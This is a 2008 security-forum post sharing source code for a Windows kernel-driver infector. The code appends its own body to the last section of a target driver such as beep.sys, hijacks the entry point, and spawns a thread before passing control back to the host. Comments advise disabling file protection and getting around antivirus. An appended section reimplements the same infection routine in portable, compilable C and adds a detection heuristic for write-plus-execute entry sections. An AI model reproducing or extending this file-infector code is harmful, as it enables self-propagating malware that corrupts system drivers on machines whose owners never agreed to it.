Complete driver infection code (compiles)

Author: sudami
Time: 2008-05-28, 21:59:10
Link: http://bbs.pediy.com/showthread.php?t=65628

/*
 * Module: infectdriver.c
 *
 * Author: Old Y (originally posted on kanxue; Old Y's code is incomplete and has to be completed by yourself)
 * Fixer: sudami [sudami@163.com]
 * Time: 08/05/28
 *
 * Comment:
 *
 * Half a year ago a big shot came to kanxue to give a "driver infection" primer. I did not understand it at all at the time. Six months
 * later it suddenly came back to me, so I tried to learn it. It took a few days of fiddling before it finally debugged successfully. The key point
 * is computing the size of the driver body. After the driver is compiled, open it with IDA:
 * 1. Calculate the offset from the first variable to the call $+5.
 * 2. Calculate the offset from ulEndAddr to the end of the file. It is usually the short dd of INIT.
 *
 * Description:
 *
 * The driver's functionality is simple and can be extended by yourself. After a successful infection it only creates one thread that keeps printing a message.
 * When you extend it with your own functionality, always remember to relocate global variables and functions.
 * You can use the KGetGlobalVarAddr() function for that; the infected part is commented in detail.
 * See the source for details.
 *
 * If you want to infect system files such as beep.sys and null.sys, remember to remove SFP first. Of course, active defense such as Micropoint's
 * no longer allows modifying .sys files in the drivers directory at all; you will have to find your own way around that.
 *
 * zjjmj2002 previously wrote a driver-infecting sys that is a bit more twisted: it hooks NtOpenFile and infects
 * whichever driver file the user accesses. Very evil ~~~~
 *
 * Copyright (c) 2008 sudami.
 * Freely distributable in source or binary for non-commercial purposes.
 * This is not a virus, so take it easy, just for fun.
 *
 */

I am posting it so that those who have not touched this before take fewer detours and do not need half a day just to get it debugged ~~
Do not use it for illegal purposes.

The two key parts are as follows:

/**
 * @brief Infect the specified file
 *
 * @param [in] pwszFileName           name of the driver to infect
 * @param [in] ulNewEntryPointDelta   distance from the start of the infected body to its DriverEntry function
 * @return STATUS_SUCCESS on success; any other value indicates failure.
 */
NTSTATUS KInfect(WCHAR *pwszFileName, ULONG ulNewEntryPointDelta)
{
    // Local declarations (ulDelta, ulTmp, ulBodySize, ulSecNum, ulFileAlignment, ulSectionAlignment,
    // ulNewFilePos, ulReturnLength, nRetCode, nResult and the PE context) are in the full source.

    //
    // call $+5 / pop: obtain our own run-time address, so the body can be located
    // no matter where the infected driver ends up loaded
    //
    __asm {
        call my_next
my_next:
        pop eax
        sub eax, 5
        mov ulDelta, eax
    }

    //
    // Both constants are measured in IDA for this particular build (see the header comment):
    // 0x14b7 is the distance from the first global variable to the call $+5 above,
    // 0x34 is the distance from ulEndAddr to the end of the file
    //
    ulTmp = ulDelta - 0x14b7;               // start of the body = address of the first global variable
    ulBodySize = ulEndAddr - ulTmp + 0x34;

    nRetCode = KPeInitFromFileW(
        &PE,
        pwszFileName
        );
    if (!NT_SUCCESS(nRetCode)) {
        goto Exit0;
    }
    if (PE.pDosHdr->e_csum == 0x5748) {     // infection mark: already infected, leave it alone
        goto Exit0;
    }
    ulSecNum = KPeGetSecNum(&PE);
    if (!ulSecNum) {
        goto Exit0;
    }
    //
    // Align
    // Misc.VirtualSize - size of the section in memory (the real, unaligned size)
    // SizeOfRawData   - size of the section's data in the file (a multiple of FileAlignment)
    //
    ulFileAlignment = PE.pNtHdr->OptionalHeader.FileAlignment;          // alignment of sections in the file
    ulSectionAlignment = PE.pNtHdr->OptionalHeader.SectionAlignment;    // alignment of sections in memory once loaded
    PE.pSecHdr[ulSecNum - 1].SizeOfRawData =
        ((PE.pSecHdr[ulSecNum - 1].SizeOfRawData - 1) / ulFileAlignment + 1) * ulFileAlignment;
    PE.pSecHdr[ulSecNum - 1].Misc.VirtualSize =
        ((PE.pSecHdr[ulSecNum - 1].Misc.VirtualSize - 1) / ulFileAlignment + 1) * ulFileAlignment;

    //
    // PointerToRawData    - file offset of the section; used to locate the section in the file
    // ulNewFilePos        - new write position, i.e. the end of the last section
    // e_ip                - initial instruction pointer; e_cs - initial code segment (relative)
    // AddressOfEntryPoint - program entry RVA
    //
    // The new entry point is moved to the end of the last section, where the body's DriverEntry lives.
    // The original entry RVA is parked in the unused DOS header fields e_ip/e_cs so the body can jump back to it.
    //
    ulNewFilePos = PE.pSecHdr[ulSecNum - 1].SizeOfRawData + PE.pSecHdr[ulSecNum - 1].PointerToRawData;
    PE.pDosHdr->e_ip = (USHORT)(PE.pNtHdr->OptionalHeader.AddressOfEntryPoint & 0xFFFF);
    PE.pDosHdr->e_cs = (USHORT)((PE.pNtHdr->OptionalHeader.AddressOfEntryPoint >> 16) & 0xFFFF);
    PE.pNtHdr->OptionalHeader.AddressOfEntryPoint =
        ulNewEntryPointDelta +
        PE.pSecHdr[ulSecNum - 1].VirtualAddress +
        PE.pSecHdr[ulSecNum - 1].Misc.VirtualSize;
    //
    // Grow the last section by ulBodySize, the size of the infected body
    //
    PE.pSecHdr[ulSecNum - 1].SizeOfRawData += ulBodySize;
    PE.pSecHdr[ulSecNum - 1].Misc.VirtualSize += ulBodySize;
    //
    // Write the infection mark
    // e_csum is the (unused) DOS header checksum
    //
    PE.pDosHdr->e_csum = 0x5748;
    nRetCode = KSeek(PE.hFile, ulNewFilePos);
    if (!NT_SUCCESS(nRetCode)) {
        goto Exit0;
    }

    nRetCode = KWriteFile(
        PE.hFile,
        (PVOID)ulTmp,       // start of the buffer: the address of the body's first global variable
        ulBodySize,
        &ulReturnLength
        );
    if (!NT_SUCCESS(nRetCode)) {
        goto Exit0;
    }

    PE.pNtHdr->OptionalHeader.SizeOfImage =
        PE.pSecHdr[ulSecNum - 1].VirtualAddress + PE.pSecHdr[ulSecNum - 1].Misc.VirtualSize;

    // The body contains code and writable globals, and must stay mapped after DriverEntry returns
    PE.pSecHdr[ulSecNum - 1].Characteristics |= (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE);
    PE.pSecHdr[ulSecNum - 1].Characteristics &= (~IMAGE_SCN_MEM_DISCARDABLE);

    //
    // Seek back to the start of the file so the updated headers can be written back
    //
    nRetCode = KSeek(PE.hFile, 0);
    if (!NT_SUCCESS(nRetCode)) {
        goto Exit0;
    }

    ..........
Exit0:
    KDelete(PE.pSecHdr);
    PE.pSecHdr = NULL;
    KDelete(PE.pNtHdr);
    PE.pNtHdr = NULL;
    KDelete(PE.pDosHdr);
    PE.pDosHdr = NULL;
    KClose(PE.hFile);
    return nResult;
}

//
// This driver infects system32\drivers\beep.sys. The infection method is to enlarge the last section and
// then write the body code there. Once the infected driver has loaded, it uses DbgPrint to output "I'm here"
// once a second, which you can watch in WinDbg or DbgView.
//
NTSTATUS
DriverEntry(
    IN PDRIVER_OBJECT DriverObject,
    IN PUNICODE_STRING RegistryPath
    )
{
    ....
Exit0:
    //
    // Fetch the original entry point through KGetGlobalVarAddr (the body can be loaded at any address,
    // so every global must be relocated). If there is one, start our thread and hand over to the host driver.
    // The pops below undo the compiler's prologue (push ebx / esi / edi) by hand before the jump.
    //
    __asm
    {
        push offset g_ulOrgEntryPoint
        call KGetGlobalVarAddr
        mov eax, [eax]
        or eax, eax
        jz Exit1
        push eax                    // save eax - the original EOP
        call KCreateSystemThread    // do what we want
        pop eax                     // restore eax - the original EOP
        pop edi
        pop esi
        pop ebx
        mov esp, ebp
        pop ebp
        jmp eax                     // jump to the host's original entry and let it carry on
    }
Exit1:
    //
    // No original entry point (not running as an infection): fail the load
    //
    __asm
    {
        mov eax, 0c0000001h         // STATUS_UNSUCCESSFUL
        pop edi
        pop esi
        pop ebx
        mov esp, ebp
        pop ebp
        retn 8
    }
}
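As an added example (my own code, not the post's or sudami's), here is the same header arithmetic KInfect performs, done on a constructed in-memory 32-bit PE so it builds and runs without windows.h or a kernel. It goes a little beyond the post: it refuses an image that has an overlay after the last section, pads the new raw size to FileAlignment and rounds SizeOfImage to SectionAlignment, includes the e_ip/e_cs read-back the body's DriverEntry relies on to find the host's entry point, and adds a defender-side check for an entry point sitting in a writable+executable last section. The sample image, the 0xCC body bytes and all function names are constructed for the example.

```c
#include <stdint.h>
#include <string.h>

#define INFECT_MARK               0x5748u   /* e_csum marker, same value as the post */
#define IMAGE_SCN_CNT_CODE        0x00000020u
#define IMAGE_SCN_MEM_DISCARDABLE 0x02000000u
#define IMAGE_SCN_MEM_EXECUTE     0x20000000u
#define IMAGE_SCN_MEM_WRITE       0x80000000u

/* Standard PE layouts, spelled out so this builds without windows.h. */
#pragma pack(push, 1)
typedef struct {
    uint16_t e_magic, e_cblp, e_cp, e_crlc, e_cparhdr, e_minalloc, e_maxalloc;
    uint16_t e_ss, e_sp, e_csum, e_ip, e_cs, e_lfarlc, e_ovno, e_res[4];
    uint16_t e_oemid, e_oeminfo, e_res2[10];
    int32_t  e_lfanew;
} DosHdr;
typedef struct {                              /* IMAGE_NT_HEADERS32 through SizeOfHeaders */
    uint32_t Signature; uint16_t Machine, NumberOfSections;
    uint32_t TimeDateStamp, PointerToSymbolTable, NumberOfSymbols;
    uint16_t SizeOfOptionalHeader, Characteristics, Magic; uint8_t LinkerVersion[2];
    uint32_t SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData, AddressOfEntryPoint;
    uint32_t BaseOfCode, BaseOfData, ImageBase, SectionAlignment, FileAlignment;
    uint16_t OsVersion[2], ImageVersion[2], SubsystemVersion[2];
    uint32_t Win32VersionValue, SizeOfImage, SizeOfHeaders;
} NtHdr;
typedef struct {
    uint8_t  Name[8];
    uint32_t VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData;
    uint32_t PointerToRelocations, PointerToLinenumbers;
    uint16_t NumberOfRelocations, NumberOfLinenumbers; uint32_t Characteristics;
} SecHdr;
#pragma pack(pop)

static uint32_t align_up(uint32_t v, uint32_t a) { return a ? ((v + a - 1) / a) * a : v; }
static NtHdr *nt_hdr(uint8_t *img) { return (NtHdr *)(img + ((DosHdr *)img)->e_lfanew); }
static SecHdr *last_section(uint8_t *img) {   /* section table follows the optional header */
    NtHdr *nt = nt_hdr(img);
    return (SecHdr *)((uint8_t *)nt + 24 + nt->SizeOfOptionalHeader) + nt->NumberOfSections - 1;
}
int pe_is_marked(const uint8_t *img) { return ((const DosHdr *)img)->e_csum == INFECT_MARK; }
/* What the body's DriverEntry reads back to find the host's entry point. */
uint32_t pe_original_entry(const uint8_t *img) {
    const DosHdr *d = (const DosHdr *)img;
    return ((uint32_t)d->e_cs << 16) | d->e_ip;
}
/* Defender-side heuristic: entry point inside a writable+executable last section. */
int pe_entry_in_wx_last_section(uint8_t *img) {
    SecHdr *s = last_section(img);
    uint32_t ep = nt_hdr(img)->AddressOfEntryPoint, wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE;
    return ep >= s->VirtualAddress && ep < s->VirtualAddress + s->VirtualSize &&
           (s->Characteristics & wx) == wx;
}

/* Append body to the last section and point the entry at body+ep_delta.
 * Returns the new file length, or 0 if the image is unusable or already marked. */
size_t pe_append_body(uint8_t *img, size_t len, size_t cap,
                      const uint8_t *body, uint32_t body_size, uint32_t ep_delta)
{
    DosHdr *dos = (DosHdr *)img;
    if (len < sizeof(DosHdr) || dos->e_magic != 0x5A4D || dos->e_lfanew < 0 ||
        (size_t)dos->e_lfanew + sizeof(NtHdr) > len) return 0;
    NtHdr *nt = nt_hdr(img);
    if (nt->Signature != 0x00004550 || nt->NumberOfSections == 0) return 0;
    if (pe_is_marked(img)) return 0;                    /* infect only once */
    SecHdr *s = last_section(img);
    /* The last section must also end the file: an overlay after it (e.g. an Authenticode
     * signature) would be clobbered, so refuse rather than corrupt it. */
    if (len != (size_t)s->PointerToRawData + s->SizeOfRawData) return 0;
    /* The body must sit at the same offset from the section start in the file and in
     * memory, so take the larger of the two sizes and round it up to FileAlignment. */
    uint32_t cur = s->VirtualSize > s->SizeOfRawData ? s->VirtualSize : s->SizeOfRawData;
    uint32_t off = align_up(cur, nt->FileAlignment);
    uint32_t new_raw = align_up(off + body_size, nt->FileAlignment);
    if ((size_t)s->PointerToRawData + new_raw > cap) return 0;
    uint8_t *sec = img + s->PointerToRawData;
    memset(sec + s->SizeOfRawData, 0, new_raw - s->SizeOfRawData);   /* zero the padding */
    memcpy(sec + off, body, body_size);
    /* Park the old entry RVA in the unused DOS fields e_ip/e_cs, then redirect the entry. */
    dos->e_ip = (uint16_t)(nt->AddressOfEntryPoint & 0xFFFF);
    dos->e_cs = (uint16_t)(nt->AddressOfEntryPoint >> 16);
    nt->AddressOfEntryPoint = s->VirtualAddress + off + ep_delta;
    s->VirtualSize = off + body_size;
    s->SizeOfRawData = new_raw;
    s->Characteristics |= IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE;
    s->Characteristics &= ~IMAGE_SCN_MEM_DISCARDABLE;  /* body must outlive DriverEntry */
    nt->SizeOfImage = align_up(s->VirtualAddress + s->VirtualSize, nt->SectionAlignment);
    dos->e_csum = INFECT_MARK;
    return (size_t)s->PointerToRawData + new_raw;
}

/* Constructed sample (not a real driver): one .text section, VirtualSize 0x100 at RVA 0x1000,
 * 0x200 raw bytes at file offset 0x200, entry point at RVA 0x1010. Returns the file length. */
size_t build_sample_image(uint8_t *buf, size_t cap)
{
    if (cap < 0x400) return 0;
    memset(buf, 0, 0x400);
    DosHdr *dos = (DosHdr *)buf; dos->e_magic = 0x5A4D; dos->e_lfanew = 0x80;
    NtHdr *nt = (NtHdr *)(buf + 0x80);
    nt->Signature = 0x00004550; nt->Machine = 0x14C; nt->NumberOfSections = 1;
    nt->SizeOfOptionalHeader = 0xE0; nt->Magic = 0x10B; nt->ImageBase = 0x10000;
    nt->AddressOfEntryPoint = 0x1010; nt->SectionAlignment = 0x1000; nt->FileAlignment = 0x200;
    nt->SizeOfImage = 0x2000; nt->SizeOfHeaders = 0x200;
    SecHdr *s = (SecHdr *)(buf + 0x80 + 24 + 0xE0); memcpy(s->Name, ".text", 5);
    s->VirtualSize = 0x100; s->VirtualAddress = 0x1000; s->SizeOfRawData = 0x200; s->PointerToRawData = 0x200;
    s->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE;
    return 0x400;
}
```

On the sample image, appending a 0x50-byte body with ep_delta 0x10 moves the entry from RVA 0x1010 to 0x1210 (0x1000 + the 0x200 of existing raw data + 0x10), stores 0x1010 in e_ip/e_cs, grows the section to VirtualSize 0x250 / SizeOfRawData 0x400, and leaves SizeOfImage at 0x2000. The point of the overlay check is that a signed driver carries its Authenticode blob after the last section; blindly seeking to the end of the last section's raw data, as the post does, would write over it. The W+X heuristic is cheap and catches exactly what this technique produces, so it is worth running over the drivers directory when hunting for this kind of infection.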

[Attachment: snap1.gif, http://bbs.pediy.com/attachment.php?attachmentid=14468&d=1211983112]
